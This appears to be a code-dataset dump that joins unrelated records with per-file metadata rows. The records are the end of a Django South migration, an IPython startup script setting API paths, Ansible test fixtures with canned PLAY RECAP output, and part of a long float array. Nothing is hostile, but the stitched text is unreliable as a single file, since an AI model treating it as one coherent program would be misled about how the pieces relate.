'url': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'})
},
'challenge_mgr.pagesetting': {
'Meta': {'ordering': "['page', 'game', 'widget']", 'unique_together': "(('page', 'game', 'widget'),)", 'object_name': 'PageSetting'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.PageInfo']"}),
'widget': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.roundsetting': {
'Meta': {'ordering': "['start']", 'object_name': 'RoundSetting'},
'end': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 6, 23, 12, 47, 16, 169)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Round 1'", 'max_length': '50'}),
'start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 6, 16, 12, 47, 16, 115)'})
},
'challenge_mgr.sponsor': {
'Meta': {'ordering': "['priority', 'name']", 'object_name': 'Sponsor'},
'challenge': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.ChallengeSetting']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'logo_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': "'1'"}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'challenge_mgr.uploadimage': {
'Meta': {'object_name': 'UploadImage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['challenge_mgr']
| 72.344398
| 176
| 0.610037
| 1,981
| 17,435
| 5.223624
| 0.079253
| 0.095091
| 0.165056
| 0.235794
| 0.848666
| 0.800445
| 0.776768
| 0.760437
| 0.727
| 0.642443
| 0
| 0.01871
| 0.178434
| 17,435
| 240
| 177
| 72.645833
| 0.703714
| 0.043074
| 0
| 0.1875
| 0
| 0.005208
| 0.524607
| 0.32121
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010417
| false
| 0
| 0.020833
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96d615b0bcf79439f64ec8c5f8eff7aa70d10a63
| 205
|
py
|
Python
|
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
import sys ;
sys.path.append('./api')
sys.path.append('../api')
sys.path.append('../../api')
sys.path.append('../../../api')
sys.path.append('../../../../api')
from api.utils import *
import pandas as pd
| 20.5
| 34
| 0.6
| 30
| 205
| 4.1
| 0.333333
| 0.284553
| 0.528455
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0
| 0
| 0.082927
| 205
| 9
| 35
| 22.777778
| 0.654255
| 0
| 0
| 0
| 0
| 0
| 0.229268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.375
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c0db2fd1dcae48f81fcffe580c1d5300fe9de09
| 2,587
|
py
|
Python
|
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
from subprocess import CompletedProcess
ANSIBLE_FAIL_OUTPUT = """\
PLAY RECAP *********************************************************************
unittest1.cooperlees.com : ok=0 changed=0 unreachable=0 failed=1 skipped=1 rescued=0 ignored=0
unittest2.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
"""
ANSIBLE_SUCCESS_OUTPUT = """\
PLAY RECAP *********************************************************************
unittest1.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
unittest2.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
"""
ANSIBLE_FAIL_CP = CompletedProcess(
["ansible-playbook", "--success"], 1, ANSIBLE_FAIL_OUTPUT, ""
)
ANSIBLE_SUCCESS_CP = CompletedProcess(
["ansible-playbook"], 0, ANSIBLE_SUCCESS_OUTPUT, ""
)
# ansible keys are only first because we run after SUCCESS parsing ...
EXPECTED_FAIL_STATS = {
"ansible_last_run_returncode": 1,
"ansible_stats_last_updated": 69,
"host_unittest1.cooperlees.com_ok": 0,
"host_unittest1.cooperlees.com_changed": 0,
"host_unittest1.cooperlees.com_unreachable": 0,
"host_unittest1.cooperlees.com_failed": 1,
"host_unittest1.cooperlees.com_skipped": 1,
"host_unittest1.cooperlees.com_rescued": 0,
"host_unittest1.cooperlees.com_ignored": 0,
"host_unittest2.cooperlees.com_ok": 7,
"host_unittest2.cooperlees.com_changed": 0,
"host_unittest2.cooperlees.com_unreachable": 0,
"host_unittest2.cooperlees.com_failed": 0,
"host_unittest2.cooperlees.com_skipped": 1,
"host_unittest2.cooperlees.com_rescued": 0,
"host_unittest2.cooperlees.com_ignored": 0,
}
EXPECTED_SUCCESS_STATS = {
"host_unittest1.cooperlees.com_ok": 7,
"host_unittest1.cooperlees.com_changed": 0,
"host_unittest1.cooperlees.com_unreachable": 0,
"host_unittest1.cooperlees.com_failed": 0,
"host_unittest1.cooperlees.com_skipped": 1,
"host_unittest1.cooperlees.com_rescued": 0,
"host_unittest1.cooperlees.com_ignored": 0,
"host_unittest2.cooperlees.com_ok": 7,
"host_unittest2.cooperlees.com_changed": 0,
"host_unittest2.cooperlees.com_unreachable": 0,
"host_unittest2.cooperlees.com_failed": 0,
"host_unittest2.cooperlees.com_skipped": 1,
"host_unittest2.cooperlees.com_rescued": 0,
"host_unittest2.cooperlees.com_ignored": 0,
"ansible_last_run_returncode": 0,
"ansible_stats_last_updated": 69,
}
| 41.725806
| 118
| 0.683031
| 312
| 2,587
| 5.394231
| 0.147436
| 0.247178
| 0.20915
| 0.21628
| 0.796791
| 0.715389
| 0.715389
| 0.677956
| 0.677956
| 0.677956
| 0
| 0.044272
| 0.153073
| 2,587
| 61
| 119
| 42.409836
| 0.72387
| 0.034789
| 0
| 0.603774
| 0
| 0.075472
| 0.728257
| 0.548297
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4fcfac67504a26ada1679b0bb81751f8ab24fd79
| 64,747
|
py
|
Python
|
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | null | null | null |
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | null | null | null |
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | 1
|
2021-03-21T17:54:26.000Z
|
2021-03-21T17:54:26.000Z
|
h_mec4 = [3.0, 4.0, 3.0, 1.0, 4.0, 2.0, 2.0, 2.0, 2.0, 2.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 2.0, 2.0, 4.0, 4.0, 3.0, 4.0, 1.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 3.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 2.0, 2.0, 3.0, 2.0, 1.0, 1.0, 4.0, 1.0, 3.0, 1.0, 4.0, 3.0, 1.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 2.0, 2.0, 4.0, 1.0, 2.0, 4.0, 2.0, 1.0, 2.0, 1.0, 4.0, 4.0, 2.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 4.0, 2.0, 2.0, 1.0, 2.0, 3.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 4.0, 4.0, 1.0, 4.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 2.0, 1.0, 1.0, 3.0, 2.0, 3.0, 1.0, 4.0, 1.0, 3.0, 4.0, 4.0, 3.0, 3.0, 1.0, 3.0, 2.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 4.0, 2.0, 1.0, 4.0, 2.0, 2.0, 1.0, 1.0, 4.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 2.0, 3.0, 4.0, 1.0, 1.0, 3.0, 2.0, 4.0, 4.0, 3.0, 1.0, 2.0, 2.0, 1.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 4.0, 4.0, 3.0, 3.0, 2.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 4.0, 2.0, 3.0, 3.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 4.0, 3.0, 4.0, 2.0, 2.0, 1.0, 3.0, 4.0, 4.0, 2.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 4.0, 2.0, 1.0, 3.0, 4.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 3.0, 2.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 2.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 2.0, 4.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 2.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 2.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 4.0, 1.0, 1.0, 2.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 2.0, 3.0, 2.0, 4.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 4.0, 2.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 1.0, 4.0, 2.0, 1.0, 2.0, 3.0, 4.0, 2.0, 2.0, 1.0, 3.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 1.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 4.0, 4.0, 3.0, 2.0, 3.0, 2.0, 2.0, 2.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 3.0, 2.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 2.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 4.0, 2.0, 4.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 1.0, 4.0, 2.0, 1.0, 2.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 4.0, 3.0, 3.0, 4.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 4.0, 2.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 2.0, 4.0, 3.0, 4.0, 2.0, 2.0, 4.0, 4.0, 3.0, 1.0, 2.0, 3.0, 4.0, 2.0, 1.0, 4.0, 2.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 3.0, 4.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 4.0, 3.0, 2.0, 2.0, 2.0, 3.0, 4.0, 4.0, 2.0, 3.0, 2.0, 1.0, 1.0, 1.0, 4.0, 1.0, 4.0, 2.0, 1.0, 4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 2.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 3.0, 1.0, 2.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 2.0, 3.0, 3.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 2.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 4.0, 3.0, 4.0, 4.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 2.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 4.0, 2.0, 2.0, 1.0, 2.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 4.0, 1.0, 1.0, 3.0, 1.0, 4.0, 2.0, 1.0, 3.0, 2.0, 2.0, 1.0, 2.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 4.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 3.0, 2.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 4.0, 3.0, 4.0, 4.0, 4.0, 3.0, 2.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 2.0, 1.0, 3.0, 2.0, 1.0, 4.0, 1.0, 3.0, 2.0, 1.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 2.0, 1.0, 3.0, 4.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 3.0, 4.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 4.0, 3.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 4.0, 1.0, 1.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 4.0, 1.0, 4.0, 1.0, 1.0, 4.0, 1.0, 3.0, 2.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 2.0, 2.0, 4.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 2.0, 4.0, 4.0, 1.0, 2.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 2.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 2.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 4.0, 2.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 2.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 4.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 4.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 4.0, 4.0, 3.0, 2.0, 4.0, 3.0, 2.0, 4.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 4.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 2.0, 2.0, 3.0, 3.0, 2.0, 2.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 1.0, 2.0, 4.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 1.0, 4.0, 3.0, 3.0, 3.0, 3.0, 4.0, 2.0, 2.0, 3.0, 4.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 2.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 3.0, 2.0, 4.0, 3.0, 1.0, 4.0, 4.0, 2.0, 2.0, 1.0, 1.0, 3.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 3.0, 3.0, 2.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 2.0, 3.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 2.0, 4.0, 1.0, 1.0, 4.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 3.0, 3.0, 4.0, 1.0, 4.0, 1.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 2.0, 1.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 4.0, 3.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 2.0, 4.0, 3.0, 2.0, 4.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 3.0, 1.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 2.0, 2.0, 2.0, 1.0, 2.0, 3.0, 4.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 2.0, 1.0, 2.0, 2.0, 2.0, 3.0, 3.0, 2.0, 4.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 3.0, 2.0, 1.0, 4.0, 2.0, 3.0, 2.0, 1.0, 3.0, 1.0, 2.0, 2.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 2.0, 3.0, 1.0, 4.0, 1.0, 1.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 2.0, 3.0, 4.0, 4.0, 1.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 4.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 4.0, 2.0, 2.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 2.0, 3.0, 1.0, 4.0, 3.0, 3.0, 3.0, 3.0, 2.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 2.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 1.0, 1.0, 3.0, 2.0, 1.0, 4.0, 4.0, 1.0, 2.0, 4.0, 4.0, 3.0, 1.0, 4.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 4.0, 4.0, 2.0, 3.0, 2.0, 4.0, 3.0, 1.0, 4.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 2.0, 3.0, 4.0, 4.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 2.0, 2.0, 2.0, 1.0, 1.0, 2.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 4.0, 3.0, 3.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 4.0, 4.0, 3.0, 1.0, 4.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 2.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 3.0, 2.0, 1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 3.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 2.0, 2.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 4.0, 4.0, 1.0, 4.0, 4.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 3.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 3.0, 2.0, 2.0, 1.0, 